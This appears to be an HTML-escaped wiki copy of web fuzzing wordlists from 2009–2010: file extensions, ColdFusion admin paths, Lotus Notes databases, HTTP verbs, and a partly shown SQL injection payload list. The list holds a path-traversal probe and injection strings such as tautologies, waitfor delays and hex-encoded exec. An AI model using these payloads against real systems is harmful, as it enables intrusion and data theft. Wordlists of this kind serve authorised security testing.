.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  ll HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
